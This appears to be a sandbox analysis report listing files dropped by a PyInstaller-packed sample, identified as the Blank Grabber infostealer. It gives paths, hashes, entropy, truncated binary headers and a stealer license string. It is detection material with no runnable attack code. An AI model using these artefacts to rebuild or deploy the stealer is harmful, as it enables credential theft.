Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...V...V...V......V..W...V..S...V..R...V..U...V.a.W...V.s.W...V...W.;.V.a.U...V.a.[...V.a.V...V.a.....V.a.T...V.Rich..V.........PE..d...q(.b.........." .....p................................................... ............`.............................................P........................'......................................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc................j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33264
Entropy (8bit):	7.645283646866556
Encrypted:	false
SSDEEP:	768:rzmfA5r8DJk6cG5pq+Iv5IiyYiSyvUqbIteE+K:rzmG8DJkV+Iv5Iiy7Syif
MD5:	8BA5202E2F3FB1274747AA2AE7C3F7BF
SHA1:	8D7DBA77A6413338EF84F0C4DDF929B727342C16
SHA-256:	0541A0028619AB827F961A994667F9A8F1A48C8B315F071242A69D1BD6AEAB8B
SHA-512:	D19322A1ABA0DA1AA68E24315CDBB10D63A5E3021B364B14974407DC3D25CD23DF4FF1875B12339FD4613E0F3DA9E5A78F1A0E54FFD8360ED764AF20C3ECBB49
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?..2?..2?..J...2?.G>..2?.G:..2?.G;..2?.G<..2?.+G>..2?.9@>..2?.jK>..2?..2>.l2?.+G2..2?.+G?..2?.+G...2?.+G=..2?.Rich.2?.........PE..d....(.b.........." .....P..........p/.......................................P............`..........................................K..P....I.......@.......................K......................................p;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84976
Entropy (8bit):	7.919746609337062
Encrypted:	false
SSDEEP:	1536:fZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfo0Dm8wIve1M77Syi7:v7HdSpd+co4AhRiXT0DiIve1M7c7
MD5:	215ACC93E63FB03742911F785F8DE71A
SHA1:	D4E3B46DB5D4FCDD4F6B6874B060B32A4B676BF9
SHA-256:	FFDBE11C55010D33867317C0DC2D1BD69F8C07BDA0EA0D3841B54D4A04328F63
SHA-512:	9223A33E8235C566D280A169F52C819A83C3E6FA1F4B8127DDE6D4A1B7E940DF824CCAF8C0000EAC089091FDE6AE89F0322FE62E47328F07EA92C7705ACE4A72
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J..G.......A.......H.......K.......@......@......A...C...&......y......B......B......B...RichC...........................PE..d....(.b.........." ..... ................................................................`.........................................4...L....................@..........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	23536
Entropy (8bit):	7.403882539076591
Encrypted:	false
SSDEEP:	384:PVOBO+iv3GmArtK6qsriOU3c4KFPsZa7gJXxeMIv7UiNqIYiSy1pCQe9g4i/8E9x:dOa1OtK/sriO2Q0phlIv7UixYiSyvcgB
MD5:	7B9F914D6C0B80C891FF7D5C031598D9
SHA1:	EF9015302A668D59CA9EB6EBC106D82F65D6775C
SHA-256:	7F80508EDFF0896596993BF38589DA38D95BC35FB286F81DF361B5BF8C682CAE
SHA-512:	D24C2FF50649FE604B09830FD079A6AD488699BB3C44EA7ACB6DA3F441172793E6A38A1953524F5570572BD2CF050F5FEE71362A82C33F9BB9381AC4BB412D68
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................C......Q............C......C......C......C......Rich............................PE..d...r(.b.........." .....0................................................................`.............................................L.......P............`..............<...........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	40944
Entropy (8bit):	7.702142071966167
Encrypted:	false
SSDEEP:	768:5p4KUJsCditRTP+g7X1eloezpnmhclAka9TdTsGW9Vm0NpDrZIvQwHmAYiSyveDd:5pghditRD+gReloMpnmaydTjWfbrZIvY
MD5:	1F7E5E111207BC4439799EBF115E09ED
SHA1:	E8B643F19135C121E77774EF064C14A3A529DCA3
SHA-256:	179EBBE9FD241F89DF31D881D9F76358D82CEDEE1A8FB40215C630F94EB37C04
SHA-512:	7F8A767B3E17920ACFAAFD4A7ED19B22862D8DF5BDF4B50E0D53DFBF32E9F2A08F5CDE97ACECB8ABF8F10FBBEDB46C1D3A0B9EB168D11766246AFE9E23ADA6FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Rv...............ok.....Db......Db......Db......Db.......b...............e.......b.......b.......b.......b......Rich............PE..d....(.b.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48624
Entropy (8bit):	7.7486730117609754
Encrypted:	false
SSDEEP:	768:rmDbO/i0hrNkEQ2UOiUgc7T1S/lod9VmpMSIKGJaIv32wmMRnW/qb4NC1jTNpMPD:rmDboi0hKErTSAVmeAoaqmMREUcCZT4D
MD5:	E5111E0CB03C73C0252718A48C7C68E4
SHA1:	39A494EEFECB00793B13F269615A2AFD2CDFB648
SHA-256:	C9D4F10E47E45A23DF9EB4EBB4C4F3C5153E7977DC2B92A1F142B8CCDB0BB26B
SHA-512:	CC0A00C552B98B6B80FFA4CD7CD20600E0E368FB71E816F3665E19C28BA9239FB9107F7303289C8DB7DE5208AAEF8CD2159890996C69925176E6A04B6BECC9B1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.V/..8\|..8\|..8\|...\|..8\|X.9}..8\|l..\|..8\|X.=}..8\|X.<}..8\|X.;}..8\|.9}..8\|.9}..8\|..9\|..8\|.5}..8\|.8}..8\|..\|..8\|.:}..8\|Rich..8\|........PE..d....(.b.........." .............0......@................................................`.............................................P.......4............P..............(...........................................8...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60912
Entropy (8bit):	7.835134717497924
Encrypted:	false
SSDEEP:	1536:4d+C+aTcxwivPlbXhef/o+K/l8/yyajCOGIvt7Mpv7SyCnF2:N1aAxwivPlL+Kt8IOnIvt7MVoF2
MD5:	A65B98BF0F0A1B3FFD65E30A83E40DA0
SHA1:	9545240266D5CE21C7ED7B632960008B3828F758
SHA-256:	44214A85D06628EB3209980C0F2B31740AB8C6EB402F804816D0DAE1EC379949
SHA-512:	0F70C2722722EB04B0B996BBAF7129955E38425794551C4832BAEC8844CDE9177695D4045C0872A8FB472648C62C9BD502C9240FACCA9FB469F5CBACBE3CA505
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.X..X..X..Q..^....+.Z..../.T......P....).[....+.Z....+.\..X.+....+._....'.Z.....Y......Y....(.Y..RichX..........PE..d....(.b.........." ................`.....................................................`.........................................p...d....................P......................................................p...8...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	879899
Entropy (8bit):	5.683242093964832
Encrypted:	false
SSDEEP:	12288:EEHYKmIBWSxC6SacYgCA4a2Y80dqVwxffpEo4pJSLMNmQ:EEHYI1x1La2jpVwxffpEo40MNmQ
MD5:	D9A88C1228ECC6BDEE15AB1D8250B9F1
SHA1:	DD8F8DDE1AB2E05AEBCE3CB0B99C0B380AA3592C
SHA-256:	9DB062EEFFE2028281730237AAFD9401C7AAD3ECC781905E9539F1FF41114989
SHA-512:	FA8189705E42AD08CE50225F4545A1FF8D24BCF2E026F2F66B1CABE8FF697F5DEEDBA31A8C93E5D6988AACC78A3CDD5F29D383E34F821EFADACFAD3299E0E408
Malicious:	false
Preview:	PK..........!..0.............._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	61432
Entropy (8bit):	7.707249710720783
Encrypted:	false
SSDEEP:	1536:i3tD2NmQARFCEdQ3pj2nZFq+6oO3TUPt+0GgHL75zLv:i3ZImRF9+inZFr6oB/GelLv
MD5:	7C28DD19EF44B3A823688161B08276E7
SHA1:	E1AC9AB4E6C481A2F8E035FB79BCD8C22E359226
SHA-256:	464C3238400D4344082DE1DEC14C6A0CB724A7E82D03DC5734BD973F3B420E66
SHA-512:	FC04F56ABE187601E6A03AE339C838BC903E942A8F309B475EF26EF0D86D4B2704D8BF07E22BEC04E5D7D739F622F0A52E82C68A24B182F19873226AEBDA560E
Malicious:	false
Preview:	PK........]..X)>f.............stub-o.pyco.......R..f.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1105816
Entropy (8bit):	7.937977313955466
Encrypted:	false
SSDEEP:	24576:Uk3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Uk3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
MD5:	3CC020BACEAC3B73366002445731705A
SHA1:	6D332AB68DCA5C4094ED2EE3C91F8503D9522AC1
SHA-256:	D1AA265861D23A9B76F16906940D30F3A65C5D0597107ECB3D2E6D470B401BB8
SHA-512:	1D9B46D0331ED5B95DDA8734ABE3C0BD6F7FB1EC9A3269FEAB618D661A1644A0DC3BF8AC91778D5E45406D185965898FE87ABD3261A6F7F2968C43515A48562C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24088
Entropy (8bit):	7.527291720504194
Encrypted:	false
SSDEEP:	384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
MD5:	6F818913FAFE8E4DF7FEDC46131F201F
SHA1:	BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
SHA-256:	3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
SHA-512:	5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	205216
Entropy (8bit):	7.9213750503510605
Encrypted:	false
SSDEEP:	3072:z4A92MK5MfGhqR1qnW/Bby+h0lE4GIp8/Mgfg68oPrRHUy1oygvaO9JSj8Hrd+/g:lSMehqKnEKlEARNYRP1lgl9jHrw/BgX
MD5:	7F77A090CB42609F2EFC55DDC1EE8FD5
SHA1:	EF5A128605654350A5BD17232120253194AD4C71
SHA-256:	47B63A9370289D2544ABC5A479BFB27D707AE7DB4F3F7B6CC1A8C8F57FD0CF1F
SHA-512:	A8A06A1303E76C76D1F06B689E163BA80C1A8137ADAC80FAB0D5C1C6072A69D506E0360D8B44315EF1D88CBD0C9AC95C94D001FAD5BC40727F1070734BBBBE63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.T.?.:.?.:.?.:.6f..3.:.]f;.=.:..l;.=.:.]f?.3.:.]f>.7.:.]f9.;.:..g;.<.:.?.;...:..g>...:..g:.>.:..g.>.:..g8.>.:.Rich?.:.........PE..d.....0b.........." .........P...P..@....`...................................p............`..........................................&..4@...#....... ..........\|M...........f......................................@...@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc....P... ...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1507312
Entropy (8bit):	7.992414868541998
Encrypted:	true
SSDEEP:	24576:crd6K1Bo1WfBpYjgE47pPsk1mEbFz9S/s/owvzjN1Qf4xsb+hnj3NhpRodki1X:dK1OWfBpYjjopXtBzY/s/oohjsbenj3w
MD5:	B93EDA8CC111A5BDE906505224B717C3
SHA1:	5F1AE1AB1A3C4C023EA8138D4B09CBC1CD8E8F9E
SHA-256:	EFA27CD726DBF3BF2448476A993DC0D5FFB0264032BF83A72295AB3FC5BCD983
SHA-512:	B20195930967B4DC9F60C15D9CEAE4D577B00095F07BD93AA4F292B94A2E5601D605659E95D5168C1C2D85DC87A54D27775F8F20EBCACF56904E4AA30F1AFFBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4...4...4...A...4...[n..4...A...4...A...4...A...4...L...4...F...4...4...5...A...4...A...4...Al..4...A...4..Rich.4..........................PE..d...\(.b.........." .............P/..XE..`/..................................PF...........`...........................................E......yE.d....pE......PB.h............@F......................................dE.8...........................................UPX0.....P/.............................UPX1.........`/.....................@....rsrc........pE.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	23536
Entropy (8bit):	7.33649667835335
Encrypted:	false
SSDEEP:	384:NiRf5SV1a/dSyQMZa7gJXUOjMIv7Gi64IYiSy1pCQaKEJ94i/8E9VFShf:NGxSVQFS0pEOgIv7GimYiSyvQJ9eEwf
MD5:	3CDFDB7D3ADF9589910C3DFBE55065C9
SHA1:	860EF30A8BC5F28AE9C81706A667F542D527D822
SHA-256:	92906737EFF7FF33B9E2A72D2A86E4BD80A35018C8E40BB79433A8EA8ECE3932
SHA-512:	1FE2C918E9CE524B855D7F38D4C69563F8B8C44291EEA1DC98F04E5EBDC39C8F2D658A716429051FB91FED0B912520929A0B980C4F5B4ECB3DE1C4EB83749A45
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......fa!.".O.".O.".O.+x.. .O.puN. .O.puJ.).O.puK.*.O.puL.&.O..uN. .O.".N.b.O..rN.'.O..uB.#.O..uO.#.O..u..#.O..uM.#.O.Rich".O.................PE..d....(.b.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	627184
Entropy (8bit):	7.993580071159261
Encrypted:	true
SSDEEP:	12288:RGzKl1BqBw166xh2tElkIExaDsI5HgIi0MRuQofTkFRjcdoPANBqwJceFBWpE:RsKl/Ew166OtHxaDJJwZATkrcB9JcgWa
MD5:	59ED17799F42CC17D63A20341B93B6F6
SHA1:	5F8B7D6202B597E72F8B49F4C33135E35AC76CD1
SHA-256:	852B38BD2D05DD9F000E540D3F5E4962E64597EB864A68AA8BB28CE7008E91F1
SHA-512:	3424AD59FD71C68E0AF716B7B94C4224B2ABFB11B7613F2E565F5D82F630E89C2798E732376A3A0E1266D8D58730B2F76C4E23EFE03C47A48CBF5F0FC165D333
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.C..@C..@C..@J.@O..@...AA..@...AO..@...AK..@...AG..@...A@..@C..@..@...AB..@...AB..@...@B..@...AB..@RichC..@................PE..d....(.b.........." .....@...0......P.....................................................`..............................................!..........................................................................`...8...........................................UPX0....................................UPX1.....@.......<..................@....rsrc....0...........@..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	293360
Entropy (8bit):	7.986777578304979
Encrypted:	false
SSDEEP:	6144:zxrLHdbWP4Ue5eV0KpvRWXH4mxy2Vc2X8r1kNgi7XG09JE1j4sbV9n:zNNWP4H543vRWomxdXgku8X9U1j4sbrn
MD5:	2218B2730B625B1AEEE6A67095C101A4
SHA1:	AA7F032B9C8B40E5ECF2A0F59FA5AE3F48EFF90A
SHA-256:	5E9ADD4DD806C2DE4D694B9BB038A6716BADB7D5F912884D80D593592BCDB8CA
SHA-512:	77AA10AE645C0BA24E31DCAB4726D8FB7AA3CB9708C7C85499E7D82CE46609D43E5DC74DA7CD32C170C7DDF50C8DB8945BAF3452421316C4A46888D745DE8DA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.OJ).OJ).OJ).7.).OJ).:K(.OJ).:O(.OJ).:N(.OJ).:I(.OJ)i:K(.OJ){=K(.OJ).OK).OJ)i:G(.OJ)i:J(.OJ)i:.).OJ)i:H(.OJ)Rich.OJ)........PE..d....(.b.........." .....P...........U... ................................................`..........................................{..X....y.......p.......................{.......................................a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83736
Entropy (8bit):	6.595094797707322
Encrypted:	false
SSDEEP:	1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:	86D1B2A9070CD7D52124126A357FF067
SHA1:	18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:	62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:	7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	254744
Entropy (8bit):	6.564308911485739
Encrypted:	false
SSDEEP:	6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
